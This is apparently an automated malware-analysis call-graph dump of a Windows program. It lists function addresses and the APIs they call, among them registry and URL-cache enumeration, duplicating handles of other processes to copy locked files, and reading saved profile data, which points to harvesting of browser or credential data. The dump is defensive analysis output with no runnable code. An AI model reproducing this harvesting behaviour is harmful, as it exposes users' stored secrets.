39133->39135 39134->39135 39135->39133 39994 413959 39135->39994 40010 413ca4 39135->40010 39137 413ea2 CloseHandle 39137->39127 39139 414c2e 16 API calls 39138->39139 39140 403eb7 39139->39140 39141 414c2e 16 API calls 39140->39141 39142 403ec5 39141->39142 39143 409d1f 6 API calls 39142->39143 39144 403ee2 39143->39144 39145 409d1f 6 API calls 39144->39145 39146 403efd 39145->39146 39147 409d1f 6 API calls 39146->39147 39148 403f15 39147->39148 39149 403af5 20 API calls 39148->39149 39150 403f29 39149->39150 39151 403af5 20 API calls 39150->39151 39152 403f3a 39151->39152 39153 40414f 33 API calls 39152->39153 39159 403f4f 39153->39159 39154 403faf 40024 40b1ab ??3@YAXPAX ??3@YAXPAX 39154->40024 39156 403f5b memset 39156->39159 39157 403fb7 39157->38812 39158 4099c6 2 API calls 39158->39159 39159->39154 39159->39156 39159->39158 39160 40a8ab 9 API calls 39159->39160 39160->39159 39162 414c2e 16 API calls 39161->39162 39163 403d26 39162->39163 39164 414c2e 16 API calls 39163->39164 39165 403d34 39164->39165 39166 409d1f 6 API calls 39165->39166 39167 403d51 39166->39167 39168 409d1f 6 API calls 39167->39168 39169 403d6c 39168->39169 39170 409d1f 6 API calls 39169->39170 39171 403d84 39170->39171 39172 403af5 20 API calls 39171->39172 39173 403d98 39172->39173 39174 403af5 20 API calls 39173->39174 39175 403da9 39174->39175 39176 40414f 33 API calls 39175->39176 39182 403dbe 39176->39182 39177 403e1e 40025 40b1ab ??3@YAXPAX ??3@YAXPAX 39177->40025 39178 403dca memset 39178->39182 39180 403e26 39180->38815 39181 4099c6 2 API calls 39181->39182 39182->39177 39182->39178 39182->39181 39183 40a8ab 9 API calls 39182->39183 39183->39182 39185 414b81 9 API calls 39184->39185 39186 414c40 39185->39186 39187 414c73 memset 39186->39187 40026 409cea 39186->40026 39190 414c94 39187->39190 39189 414c64 39189->38807 40029 414592 RegOpenKeyExW 39190->40029 39193 414cc1 39194 414cf4 wcscpy 39193->39194 40030 414bb0 wcscpy 39193->40030 39194->39189 39196 414cd2 40031 4145ac RegQueryValueExW 39196->40031 39198 414ce9 RegCloseKey 39198->39194 39200 409d62 39199->39200 39201 409d43 wcscpy 39199->39201 39200->38846 39202 409719 2 API calls 39201->39202 39203 409d51 wcscat 39202->39203 39203->39200 39205 40aebe FindClose 39204->39205 39206 40ae21 39205->39206 39207 4099c6 2 API calls 39206->39207 39208 40ae35 39207->39208 39209 409d1f 6 API calls 39208->39209 39210 40ae49 39209->39210 39210->38912 39212 40ade0 39211->39212 39213 40ae0f 39211->39213 39212->39213 39214 40ade7 wcscmp 39212->39214 39213->38912 39214->39213 39215 40adfe wcscmp 39214->39215 39215->39213 39217 40ae18 9 API calls 39216->39217 39223 4453c4 39217->39223 39218 40ae51 9 API calls 39218->39223 39219 4453f3 39220 40aebe FindClose 39219->39220 39222 4453fe 39220->39222 39221 40add4 2 API calls 39221->39223 39222->38912 39223->39218 39223->39219 39223->39221 39224 445403 253 API calls 39223->39224 39224->39223 39226 40ae7b FindNextFileW 39225->39226 39227 40ae5c FindFirstFileW 39225->39227 39228 40ae94 39226->39228 39229 40ae8f 39226->39229 39227->39228 39231 40aeb6 39228->39231 39232 409d1f 6 API calls 39228->39232 39230 40aebe FindClose 39229->39230 39230->39228 39231->38912 39232->39231 39234->38869 39235->38853 39236->38853 39237->38884 39239 409c89 39238->39239 39239->38908 39240->38937 39242 413d39 39241->39242 39243 413d2f FreeLibrary 39241->39243 39244 40b633 ??3@YAXPAX 39242->39244 39243->39242 39245 413d42 39244->39245 39246 40b633 ??3@YAXPAX 39245->39246 39247 413d4a 39246->39247 39247->38900 39248->38766 39249->38767 39250->38838 39252 44db70 39251->39252 39253 40b6fc memset 39252->39253 39254 409c70 2 API calls 39253->39254 39255 40b732 wcsrchr 39254->39255 39256 40b743 39255->39256 39257 40b746 memset 39255->39257 39256->39257 39258 40b2cc 27 API calls 39257->39258 39259 40b76f 39258->39259 39260 409d1f 6 API calls 39259->39260 39261 40b783 39260->39261 40032 409b98 GetFileAttributesW 39261->40032 39263 40b792 39264 409c70 2 API calls 39263->39264 39278 40b7c2 39263->39278 39266 40b7a5 39264->39266 39268 40b2cc 27 API calls 39266->39268 39273 40b7b2 39268->39273 39269 40b837 FindCloseChangeNotification 39272 40b83e memset 39269->39272 39270 40b817 40067 409a45 GetTempPathW 39270->40067 40066 40a6e6 WideCharToMultiByte 39272->40066 39276 409d1f 6 API calls 39273->39276 39274 40b827 CopyFileW 39274->39272 39276->39278 39277 40b866 39279 444432 121 API calls 39277->39279 40033 40bb98 39278->40033 39280 40b879 39279->39280 39281 40bad5 39280->39281 39282 40b273 27 API calls 39280->39282 39283 40baeb 39281->39283 39284 40bade DeleteFileW 39281->39284 39285 40b89a 39282->39285 39286 40b04b ??3@YAXPAX 39283->39286 39284->39283 39287 438552 134 API calls 39285->39287 39288 40baf3 39286->39288 39289 40b8a4 39287->39289 39288->38769 39290 40bacd 39289->39290 39292 4251c4 137 API calls 39289->39292 39291 443d90 111 API calls 39290->39291 39291->39281 39315 40b8b8 39292->39315 39293 40bac6 40079 424f26 123 API calls 39293->40079 39294 40b8bd memset 40070 425413 17 API calls 39294->40070 39297 425413 17 API calls 39297->39315 39300 40a71b MultiByteToWideChar 39300->39315 39301 40a734 MultiByteToWideChar 39301->39315 39304 40b9b5 memcmp 39304->39315 39305 4099c6 2 API calls 39305->39315 39306 404423 37 API calls 39306->39315 39309 4251c4 137 API calls 39309->39315 39310 40bb3e memset memcpy 40080 40a734 MultiByteToWideChar 39310->40080 39312 40bb88 LocalFree 39312->39315 39315->39293 39315->39294 39315->39297 39315->39300 39315->39301 39315->39304 39315->39305 39315->39306 39315->39309 39315->39310 39316 40ba5f memcmp 39315->39316 40071 4253ef 16 API calls 39315->40071 40072 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39315->40072 40073 4253af 17 API calls 39315->40073 40074 4253cf 17 API calls 39315->40074 40075 447280 memset 39315->40075 40076 447960 memset memcpy memcpy memcpy 39315->40076 40077 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39315->40077 40078 447920 memcpy memcpy memcpy 39315->40078 39316->39315 39317->38842 39319 40aed1 39318->39319 39320 40aec7 FindClose 39318->39320 39319->38778 39320->39319 39322 4099d7 39321->39322 39323 4099da memcpy 39321->39323 39322->39323 39323->38825 39325 40b2cc 27 API calls 39324->39325 39326 44543f 39325->39326 39327 409d1f 6 API calls 39326->39327 39328 44544f 39327->39328 40169 409b98 GetFileAttributesW 39328->40169 39330 445476 39333 40b2cc 27 API calls 39330->39333 39331 44545e 39331->39330 39332 40b6ef 252 API calls 39331->39332 39332->39330 39334 445482 39333->39334 39335 409d1f 6 API calls 39334->39335 39336 445492 39335->39336 40170 409b98 GetFileAttributesW 39336->40170 39338 4454a1 39339 4454b9 39338->39339 39340 40b6ef 252 API calls 39338->39340 39339->38851 39340->39339 39341->38850 39342->38874 39343->38880 39344->38915 39345->38896 39346->38940 39347->38940 39348->38926 39349->38956 39350->38958 39351->38960 39353 414c2e 16 API calls 39352->39353 39354 40c2ae 39353->39354 39424 40c1d3 39354->39424 39359 40c3be 39376 40a8ab 39359->39376 39360 40afcf 2 API calls 39361 40c2fd FindFirstUrlCacheEntryW 39360->39361 39362 40c3b6 39361->39362 39363 40c31e wcschr 39361->39363 39364 40b04b ??3@YAXPAX 39362->39364 39365 40c331 39363->39365 39366 40c35e FindNextUrlCacheEntryW 39363->39366 39364->39359 39367 40a8ab 9 API calls 39365->39367 39366->39363 39368 40c373 GetLastError 39366->39368 39371 40c33e wcschr 39367->39371 39369 40c3ad FindCloseUrlCache 39368->39369 39370 40c37e 39368->39370 39369->39362 39372 40afcf 2 API calls 39370->39372 39371->39366 39373 40c34f 39371->39373 39374 40c391 FindNextUrlCacheEntryW 39372->39374 39375 40a8ab 9 API calls 39373->39375 39374->39363 39374->39369 39375->39366 39540 40a97a 39376->39540 39379 40a8cc 39379->38967 39546 40b1ab ??3@YAXPAX ??3@YAXPAX 39381->39546 39383 40c3dd 39384 40b2cc 27 API calls 39383->39384 39385 40c3e7 39384->39385 39547 414592 RegOpenKeyExW 39385->39547 39387 40c3f4 39388 40c50e 39387->39388 39389 40c3ff 39387->39389 39403 405337 39388->39403 39390 40a9ce 4 API calls 39389->39390 39391 40c418 memset 39390->39391 39548 40aa1d 39391->39548 39394 40c471 39396 40c47a _wcsupr 39394->39396 39395 40c505 RegCloseKey 39395->39388 39550 40a8d0 7 API calls 39396->39550 39398 40c498 39551 40a8d0 7 API calls 39398->39551 39400 40c4ac memset 39401 40aa1d 39400->39401 39402 40c4e4 RegEnumValueW 39401->39402 39402->39395 39402->39396 39552 405220 39403->39552 39407 4099c6 2 API calls 39406->39407 39408 40a714 _wcslwr 39407->39408 39409 40c634 39408->39409 39609 405361 39409->39609 39412 40c65c wcslen 39612 4053b6 39 API calls 39412->39612 39413 40c71d wcslen 39413->38981 39415 40c677 39416 40c713 39415->39416 39613 40538b 39 API calls 39415->39613 39615 4053df 39 API calls 39416->39615 39419 40c6a5 39419->39416 39420 40c6a9 memset 39419->39420 39421 40c6d3 39420->39421 39614 40c589 43 API calls 39421->39614 39423->38974 39425 40ae18 9 API calls 39424->39425 39431 40c210 39425->39431 39426 40ae51 9 API calls 39426->39431 39427 40c264 39428 40aebe FindClose 39427->39428 39430 40c26f 39428->39430 39429 40add4 2 API calls 39429->39431 39436 40e5ed memset memset 39430->39436 39431->39426 39431->39427 39431->39429 39432 40c231 _wcsicmp 39431->39432 39433 40c1d3 35 API calls 39431->39433 39432->39431 39434 40c248 39432->39434 39433->39431 39449 40c084 22 API calls 39434->39449 39437 414c2e 16 API calls 39436->39437 39438 40e63f 39437->39438 39439 409d1f 6 API calls 39438->39439 39440 40e658 39439->39440 39450 409b98 GetFileAttributesW 39440->39450 39442 40e667 39443 40e680 39442->39443 39444 409d1f 6 API calls 39442->39444 39451 409b98 GetFileAttributesW 39443->39451 39444->39443 39446 40e68f 39448 40c2d8 39446->39448 39452 40e4b2 39446->39452 39448->39359 39448->39360 39449->39431 39450->39442 39451->39446 39473 40e01e 39452->39473 39454 40e593 39455 40e5b0 39454->39455 39456 40e59c DeleteFileW 39454->39456 39458 40b04b ??3@YAXPAX 39455->39458 39456->39455 39457 40e521 39457->39454 39496 40e175 39457->39496 39459 40e5bb 39458->39459 39461 40e5c4 CloseHandle 39459->39461 39462 40e5cc 39459->39462 39461->39462 39464 40b633 ??3@YAXPAX 39462->39464 39463 40e573 39466 40e584 39463->39466 39467 40e57c FindCloseChangeNotification 39463->39467 39465 40e5db 39464->39465 39469 40b633 ??3@YAXPAX 39465->39469 39539 40b1ab ??3@YAXPAX ??3@YAXPAX 39466->39539 39467->39466 39468 40e540 39468->39463 39516 40e2ab 39468->39516 39471 40e5e3 39469->39471 39471->39448 39474 406214 22 API calls 39473->39474 39475 40e03c 39474->39475 39476 40e16b 39475->39476 39477 40dd85 74 API calls 39475->39477 39476->39457 39478 40e06b 39477->39478 39478->39476 39479 40afcf ??2@YAPAXI ??3@YAXPAX 39478->39479 39480 40e08d OpenProcess 39479->39480 39481 40e0a4 GetCurrentProcess DuplicateHandle 39480->39481 39485 40e152 39480->39485 39482 40e0d0 GetFileSize 39481->39482 39483 40e14a CloseHandle 39481->39483 39486 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39482->39486 39483->39485 39484 40e160 39488 40b04b ??3@YAXPAX 39484->39488 39485->39484 39487 406214 22 API calls 39485->39487 39489 40e0ea 39486->39489 39487->39484 39488->39476 39490 4096dc CreateFileW 39489->39490 39491 40e0f1 CreateFileMappingW 39490->39491 39492 40e140 CloseHandle CloseHandle 39491->39492 39493 40e10b MapViewOfFile 39491->39493 39492->39483 39494 40e13b FindCloseChangeNotification 39493->39494 39495 40e11f WriteFile UnmapViewOfFile 39493->39495 39494->39492 39495->39494 39497 40e18c 39496->39497 39498 406b90 11 API calls 39497->39498 39499 40e19f 39498->39499 39500 40e1a7 memset 39499->39500 39501 40e299 39499->39501 39506 40e1e8 39500->39506 39502 4069a3 ??3@YAXPAX ??3@YAXPAX 39501->39502 39503 40e2a4 39502->39503 39503->39468 39504 406e8f 13 API calls 39504->39506 39505 406b53 SetFilePointerEx ReadFile 39505->39506 39506->39504 39506->39505 39507 40e283 39506->39507 39508 40dd50 _wcsicmp 39506->39508 39512 40742e 8 API calls 39506->39512 39513 40aae3 wcslen wcslen _memicmp 39506->39513 39514 40e244 _snwprintf 39506->39514 39509 40e291 39507->39509 39510 40e288 ??3@YAXPAX 39507->39510 39508->39506 39511 40aa04 ??3@YAXPAX 39509->39511 39510->39509 39511->39501 39512->39506 39513->39506 39515 40a8d0 7 API calls 39514->39515 39515->39506 39517 40e2c2 39516->39517 39518 406b90 11 API calls 39517->39518 39538 40e2d3 39518->39538 39519 40e4a0 39520 4069a3 ??3@YAXPAX ??3@YAXPAX 39519->39520 39522 40e4ab 39520->39522 39521 406e8f 13 API calls 39521->39538 39522->39468 39523 406b53 SetFilePointerEx ReadFile 39523->39538 39524 40e489 39525 40aa04 ??3@YAXPAX 39524->39525 39526 40e491 39525->39526 39526->39519 39527 40e497 ??3@YAXPAX 39526->39527 39527->39519 39528 40dd50 _wcsicmp 39528->39538 39529 40dd50 _wcsicmp 39530 40e376 memset 39529->39530 39531 40aa29 6 API calls 39530->39531 39531->39538 39532 40742e 8 API calls 39532->39538 39533 40e3e0 memcpy 39533->39538 39534 40e3b3 wcschr 39534->39538 39535 40e3fb memcpy 39535->39538 39536 40e416 memcpy 39536->39538 39537 40e431 memcpy 39537->39538 39538->39519 39538->39521 39538->39523 39538->39524 39538->39528 39538->39529 39538->39532 39538->39533 39538->39534 39538->39535 39538->39536 39538->39537 39539->39454 39542 40a980 39540->39542 39541 40a8bb 39541->39379 39545 40a8d0 7 API calls 39541->39545 39542->39541 39543 40a995 _wcsicmp 39542->39543 39544 40a99c wcscmp 39542->39544 39543->39542 39544->39542 39545->39379 39546->39383 39547->39387 39549 40aa23 RegEnumValueW 39548->39549 39549->39394 39549->39395 39550->39398 39551->39400 39553 405335 39552->39553 39554 40522a 39552->39554 39553->38981 39555 40b2cc 27 API calls 39554->39555 39556 405234 39555->39556 39557 40a804 8 API calls 39556->39557 39558 40523a 39557->39558 39597 40b273 39558->39597 39560 405248 _mbscpy _mbscat GetProcAddress 39561 40b273 27 API calls 39560->39561 39562 405279 39561->39562 39600 405211 GetProcAddress 39562->39600 39564 405282 39565 40b273 27 API calls 39564->39565 39566 40528f 39565->39566 39601 405211 GetProcAddress 39566->39601 39568 405298 39569 40b273 27 API calls 39568->39569 39570 4052a5 39569->39570 39598 40b58d 27 API calls 39597->39598 39599 40b18c 39598->39599 39599->39560 39600->39564 39601->39568 39610 405220 39 API calls 39609->39610 39611 405369 39610->39611 39611->39412 39611->39413 39612->39415 39613->39419 39614->39416 39615->39413 39617 40440c FreeLibrary 39616->39617 39618 40436d 39617->39618 39619 40a804 8 API calls 39618->39619 39620 404377 39619->39620 39621 404383 39620->39621 39622 404405 39620->39622 39623 40b273 27 API calls 39621->39623 39622->38986 39622->38988 39622->38989 39624 40438d GetProcAddress 39623->39624 39625 40b273 27 API calls 39624->39625 39626 4043a7 GetProcAddress 39625->39626 39627 40b273 27 API calls 39626->39627 39628 4043ba GetProcAddress 39627->39628 39629 40b273 27 API calls 39628->39629 39630 4043ce GetProcAddress 39629->39630 39631 40b273 27 API calls 39630->39631 39637 404413 FreeLibrary 39636->39637 39638 40441e 39636->39638 39637->39638 39638->39003 39639->38999 39641 40442e 39640->39641 39643 40447e 39640->39643 39642 40b2cc 27 API calls 39641->39642 39644 404438 39642->39644 39643->38999 39645 40a804 8 API calls 39644->39645 39654 4135f6 39653->39654 39655 4135eb FreeLibrary 39653->39655 39654->39006 39655->39654 39683 403a29 39682->39683 39697 403bed memset memset 39683->39697 39685 403ae7 39710 40b1ab ??3@YAXPAX ??3@YAXPAX 39685->39710 39686 403a3f memset 39691 403a2f 39686->39691 39688 403aef 39688->39043 39689 409d1f 6 API calls 39689->39691 39690 409b98 GetFileAttributesW 39690->39691 39691->39685 39691->39686 39691->39689 39691->39690 39692 40a8d0 7 API calls 39691->39692 39692->39691 39694 40a051 GetFileTime FindCloseChangeNotification 39693->39694 39695 4039ca CompareFileTime 39693->39695 39694->39695 39695->39043 39696->39040 39698 414c2e 16 API calls 39697->39698 39699 403c38 39698->39699 39700 409719 2 API calls 39699->39700 39701 403c3f wcscat 39700->39701 39702 414c2e 16 API calls 39701->39702 39703 403c61 39702->39703 39704 409719 2 API calls 39703->39704 39705 403c68 wcscat 39704->39705 39711 403af5 39705->39711 39708 403af5 20 API calls 39709 403c95 39708->39709 39709->39691 39710->39688 39712 403b02 39711->39712 39713 40ae18 9 API calls 39712->39713 39715 403b37 39713->39715 39714 40ae51 9 API calls 39714->39715 39715->39714 39716 403bdb 39715->39716 39717 40add4 wcscmp wcscmp 39715->39717 39720 40ae18 9 API calls 39715->39720 39721 40aebe FindClose 39715->39721 39722 40a8d0 7 API calls 39715->39722 39718 40aebe FindClose 39716->39718 39717->39715 39719 403be6 39718->39719 39719->39708 39720->39715 39721->39715 39722->39715 39724 409d1f 6 API calls 39723->39724 39725 404190 39724->39725 39738 409b98 GetFileAttributesW 39725->39738 39727 40419c 39728 4041a7 6 API calls 39727->39728 39729 40435c 39727->39729 39731 40424f 39728->39731 39729->39068 39731->39729 39732 40425e memset 39731->39732 39734 409d1f 6 API calls 39731->39734 39735 40a8ab 9 API calls 39731->39735 39739 414842 39731->39739 39732->39731 39733 404296 wcscpy 39732->39733 39733->39731 39734->39731 39736 4042b6 memset memset _snwprintf wcscpy 39735->39736 39736->39731 39737->39066 39738->39727 39742 41443e 39739->39742 39741 414866 39741->39731 39743 41444b 39742->39743 39744 414451 39743->39744 39745 4144a3 GetPrivateProfileStringW 39743->39745 39746 414491 39744->39746 39747 414455 wcschr 39744->39747 39745->39741 39749 414495 WritePrivateProfileStringW 39746->39749 39747->39746 39748 414463 _snwprintf 39747->39748 39748->39749 39749->39741 39750->39072 39752 40b2cc 27 API calls 39751->39752 39753 409615 39752->39753 39754 409d1f 6 API calls 39753->39754 39755 409625 39754->39755 39780 409b98 GetFileAttributesW 39755->39780 40016 413f4f 39989->40016 39992 413f37 K32GetModuleFileNameExW 39993 413f4a 39992->39993 39993->39135 39995 413969 wcscpy 39994->39995 39996 41396c wcschr 39994->39996 40000 413a3a 39995->40000 39996->39995 39998 41398e 39996->39998 40021 4097f7 wcslen wcslen _memicmp 39998->40021 40000->39135 40001 41399a 40002 4139a4 memset 40001->40002 40003 4139e6 40001->40003 40022 409dd5 GetWindowsDirectoryW wcscpy 40002->40022 40005 413a31 wcscpy 40003->40005 40006 4139ec memset 40003->40006 40005->40000 40023 409dd5 GetWindowsDirectoryW wcscpy 40006->40023 40007 4139c9 wcscpy wcscat 40007->40000 40009 413a11 memcpy wcscat 40009->40000 40011 413cb0 GetModuleHandleW 40010->40011 40012 413cda 40010->40012 40011->40012 40013 413cbf GetProcAddress 40011->40013 40014 413ce3 GetProcessTimes 40012->40014 40015 413cf6 40012->40015 40013->40012 40014->39137 40015->39137 40017 413f2f 40016->40017 40018 413f54 40016->40018 40017->39992 40017->39993 40019 40a804 8 API calls 40018->40019 40020 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40019->40020 40020->40017 40021->40001 40022->40007 40023->40009 40024->39157 40025->39180 40027 409cf9 GetVersionExW 40026->40027 40028 409d0a 40026->40028 40027->40028 40028->39187 40028->39189 40029->39193 40030->39196 40031->39198 40032->39263 40034 40bba5 40033->40034 40081 40cc26 40034->40081 40037 40bd4b 40102 40cc0c 40037->40102 40042 40b2cc 27 API calls 40043 40bbef 40042->40043 40109 40ccf0 _wcsicmp 40043->40109 40045 40bbf5 40045->40037 40110 40ccb4 6 API calls 40045->40110 40047 40bc26 40048 40cf04 17 API calls 40047->40048 40049 40bc2e 40048->40049 40050 40bd43 40049->40050 40051 40b2cc 27 API calls 40049->40051 40052 40cc0c 4 API calls 40050->40052 40053 40bc40 40051->40053 40052->40037 40111 40ccf0 _wcsicmp 40053->40111 40055 40bc46 40055->40050 40056 40bc61 memset memset WideCharToMultiByte 40055->40056 40112 40103c strlen 40056->40112 40058 40bcc0 40059 40b273 27 API calls 40058->40059 40060 40bcd0 memcmp 40059->40060 40060->40050 40061 40bce2 40060->40061 40062 404423 37 API calls 40061->40062 40063 40bd10 40062->40063 40063->40050 40064 40bd3a LocalFree 40063->40064 40065 40bd1f memcpy 40063->40065 40064->40050 40065->40064 40066->39277 40068 409a74 GetTempFileNameW 40067->40068 40069 409a66 GetWindowsDirectoryW 40067->40069 40068->39274 40069->40068 40070->39315 40071->39315 40072->39315 40073->39315 40074->39315 40075->39315 40076->39315 40077->39315 40078->39315 40079->39290 40080->39312 40113 4096c3 CreateFileW 40081->40113 40083 40cc34 40084 40cc3d GetFileSize 40083->40084 40085 40bbca 40083->40085 40086 40afcf 2 API calls 40084->40086 40085->40037 40093 40cf04 40085->40093 40087 40cc64 40086->40087 40114 40a2ef ReadFile 40087->40114 40089 40cc71 40115 40ab4a MultiByteToWideChar 40089->40115 40091 40cc95 FindCloseChangeNotification 40092 40b04b ??3@YAXPAX 40091->40092 40092->40085 40094 40b633 ??3@YAXPAX 40093->40094 40095 40cf14 40094->40095 40121 40b1ab ??3@YAXPAX ??3@YAXPAX 40095->40121 40097 40bbdd 40097->40037 40097->40042 40098 40cf1b 40098->40097 40100 40cfef 40098->40100 40122 40cd4b 40098->40122 40101 40cd4b 14 API calls 40100->40101 40101->40097 40103 40b633 ??3@YAXPAX 40102->40103 40104 40cc15 40103->40104 40105 40aa04 ??3@YAXPAX 40104->40105 40106 40cc1d 40105->40106 40168 40b1ab ??3@YAXPAX ??3@YAXPAX 40106->40168 40108 40b7d4 memset CreateFileW 40108->39269 40108->39270 40109->40045 40110->40047 40111->40055 40112->40058 40113->40083 40114->40089 40116 40ab6b 40115->40116 40120 40ab93 40115->40120 40117 40a9ce 4 API calls 40116->40117 40118 40ab74 40117->40118 40119 40ab7c MultiByteToWideChar 40118->40119 40119->40120 40120->40091 40121->40098 40123 40cd7b 40122->40123 40156 40aa29 6 API calls 40123->40156 40125 40cef5 40126 40aa04 ??3@YAXPAX 40125->40126 40127 40cefd 40126->40127 40127->40098 40128 40cd89 40128->40125 40157 40aa29 6 API calls 40128->40157 40130 40ce1d 40158 40aa29 6 API calls 40130->40158 40132 40ce3e 40133 40ce6a 40132->40133 40159 40abb7 wcslen memmove 40132->40159 40134 40ce9f 40133->40134 40162 40abb7 wcslen memmove 40133->40162 40165 40a8d0 7 API calls 40134->40165 40137 40ce56 40160 40aa71 wcslen 40137->40160 40139 40ce8b 40163 40aa71 wcslen 40139->40163 40140 40ceb5 40166 40a8d0 7 API calls 40140->40166 40143 40ce5e 40161 40abb7 wcslen memmove 40143->40161 40144 40ce93 40164 40abb7 wcslen memmove 40144->40164 40148 40cecb 40167 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 40148->40167 40150 40cedd 40151 40aa04 ??3@YAXPAX 40150->40151 40152 40cee5 40151->40152 40153 40aa04 ??3@YAXPAX 40152->40153 40154 40ceed 40153->40154 40155 40aa04 ??3@YAXPAX 40154->40155 40155->40125 40156->40128 40157->40130 40158->40132 40159->40137 40160->40143 40161->40133 40162->40139 40163->40144 40164->40134 40165->40140 40166->40148 40167->40150 40168->40108 40169->39331 40170->39338 37536 44dea5 37537 44deb5 FreeLibrary 37536->37537 37538 44dec3 37536->37538 37537->37538 40180 4148b6 FindResourceW 40181 4148f9 40180->40181 40182 4148cf SizeofResource 40180->40182 40182->40181 40183 4148e0 LoadResource 40182->40183 40183->40181 40184 4148ee LockResource 40183->40184 40184->40181 37712 415304 ??3@YAXPAX 40185 441b3f 40195 43a9f6 40185->40195 40187 441b61 40368 4386af memset 40187->40368 40189 44189a 40190 442bd4 40189->40190 40191 4418e2 40189->40191 40192 4418ea 40190->40192 40370 441409 memset 40190->40370 40191->40192 40369 4414a9 12 API calls 40191->40369 40196 43aa20 40195->40196 40197 43aadf 40195->40197 40196->40197 40198 43aa34 memset 40196->40198 40197->40187 40199 43aa56 40198->40199 40200 43aa4d 40198->40200 40371 43a6e7 40199->40371 40379 42c02e memset 40200->40379 40205 43aad3 40381 4169a7 11 API calls 40205->40381 40206 43aaae 40206->40197 40206->40205 40221 43aae5 40206->40221 40207 43ac18 40210 43ac47 40207->40210 40383 42bbd5 memcpy memcpy memcpy memset memcpy 40207->40383 40211 43aca8 40210->40211 40384 438eed 16 API calls 40210->40384 40215 43acd5 40211->40215 40386 4233ae 11 API calls 40211->40386 40214 43ac87 40385 4233c5 16 API calls 40214->40385 40387 423426 11 API calls 40215->40387 40219 43ace1 40388 439811 163 API calls 40219->40388 40220 43a9f6 161 API calls 40220->40221 40221->40197 40221->40207 40221->40220 40382 439bbb 22 API calls 40221->40382 40223 43acfd 40228 43ad2c 40223->40228 40389 438eed 16 API calls 40223->40389 40225 43ad19 40390 4233c5 16 API calls 40225->40390 40227 43ad58 40391 44081d 163 API calls 40227->40391 40228->40227 40231 43add9 40228->40231 40395 423426 11 API calls 40231->40395 40232 43ae3a memset 40233 43ae73 40232->40233 40396 42e1c0 147 API calls 40233->40396 40234 43adab 40393 438c4e 163 API calls 40234->40393 40235 43ad6c 40235->40197 40235->40234 40392 42370b memset memcpy memset 40235->40392 40239 43adcc 40394 440f84 12 API calls 40239->40394 40240 43ae96 40397 42e1c0 147 API calls 40240->40397 40243 43aea8 40244 43aec1 40243->40244 40398 42e199 147 API calls 40243->40398 40246 43af00 40244->40246 40399 42e1c0 147 API calls 40244->40399 40246->40197 40249 43af1a 40246->40249 40250 43b3d9 40246->40250 40400 438eed 16 API calls 40249->40400 40255 43b3f6 40250->40255 40259 43b4c8 40250->40259 40251 43b60f 40251->40197 40459 4393a5 17 API calls 40251->40459 40254 43af2f 40401 4233c5 16 API calls 40254->40401 40441 432878 12 API calls 40255->40441 40257 43af51 40402 423426 11 API calls 40257->40402 40268 43b4f2 40259->40268 40447 42bbd5 memcpy memcpy memcpy memset memcpy 40259->40447 40261 43af7d 40403 423426 11 API calls 40261->40403 40265 43af94 40404 423330 11 API calls 40265->40404 40266 43b529 40449 44081d 163 API calls 40266->40449 40448 43a76c 21 API calls 40268->40448 40271 43afca 40405 423330 11 API calls 40271->40405 40272 43b47e 40276 43b497 40272->40276 40444 42374a memcpy memset memcpy memcpy memcpy 40272->40444 40273 43b544 40274 43b55c 40273->40274 40450 42c02e memset 40273->40450 40451 43a87a 163 API calls 40274->40451 40445 4233ae 11 API calls 40276->40445 40278 43afdb 40406 4233ae 11 API calls 40278->40406 40282 43b4b1 40446 423399 11 API calls 40282->40446 40283 43b428 40293 43b462 40283->40293 40442 432b60 16 API calls 40283->40442 40285 43b56c 40288 43b58a 40285->40288 40452 423330 11 API calls 40285->40452 40287 43afee 40407 44081d 163 API calls 40287->40407 40453 440f84 12 API calls 40288->40453 40289 43b4c1 40455 42db80 163 API calls 40289->40455 40443 423330 11 API calls 40293->40443 40295 43b592 40454 43a82f 16 API calls 40295->40454 40298 43b5b4 40456 438c4e 163 API calls 40298->40456 40300 43b5cf 40457 42c02e memset 40300->40457 40302 43b005 40302->40197 40307 43b01f 40302->40307 40408 42d836 163 API calls 40302->40408 40303 43b1ef 40418 4233c5 16 API calls 40303->40418 40305 43b212 40419 423330 11 API calls 40305->40419 40307->40303 40416 423330 11 API calls 40307->40416 40417 42d71d 163 API calls 40307->40417 40309 43b087 40409 4233ae 11 API calls 40309->40409 40310 43add4 40310->40251 40458 438f86 16 API calls 40310->40458 40313 43b22a 40420 42ccb5 11 API calls 40313->40420 40316 43b23f 40421 4233ae 11 API calls 40316->40421 40317 43b10f 40412 423330 11 API calls 40317->40412 40319 43b257 40422 4233ae 11 API calls 40319->40422 40323 43b129 40413 4233ae 11 API calls 40323->40413 40324 43b26e 40423 4233ae 11 API calls 40324->40423 40327 43b09a 40327->40317 40410 42cc15 19 API calls 40327->40410 40411 4233ae 11 API calls 40327->40411 40328 43b282 40424 43a87a 163 API calls 40328->40424 40330 43b13c 40414 440f84 12 API calls 40330->40414 40332 43b29d 40425 423330 11 API calls 40332->40425 40335 43b2af 40338 43b2b8 40335->40338 40339 43b2ce 40335->40339 40336 43b15f 40415 4233ae 11 API calls 40336->40415 40426 4233ae 11 API calls 40338->40426 40427 440f84 12 API calls 40339->40427 40342 43b2c9 40429 4233ae 11 API calls 40342->40429 40343 43b2da 40428 42370b memset memcpy memset 40343->40428 40346 43b2f9 40430 423330 11 API calls 40346->40430 40348 43b30b 40431 423330 11 API calls 40348->40431 40350 43b325 40432 423399 11 API calls 40350->40432 40352 43b332 40433 4233ae 11 API calls 40352->40433 40354 43b354 40434 423399 11 API calls 40354->40434 40356 43b364 40435 43a82f 16 API calls 40356->40435 40358 43b370 40436 42db80 163 API calls 40358->40436 40360 43b380 40437 438c4e 163 API calls 40360->40437 40362 43b39e 40438 423399 11 API calls 40362->40438 40364 43b3ae 40439 43a76c 21 API calls 40364->40439 40366 43b3c3 40440 423399 11 API calls 40366->40440 40368->40189 40369->40192 40370->40190 40372 43a6f5 40371->40372 40378 43a765 40371->40378 40372->40378 40460 42a115 40372->40460 40376 43a73d 40377 42a115 147 API calls 40376->40377 40376->40378 40377->40378 40378->40197 40380 4397fd memset 40378->40380 40379->40199 40380->40206 40381->40197 40382->40221 40383->40210 40384->40214 40385->40211 40386->40215 40387->40219 40388->40223 40389->40225 40390->40228 40391->40235 40392->40234 40393->40239 40394->40310 40395->40232 40396->40240 40397->40243 40398->40244 40399->40244 40400->40254 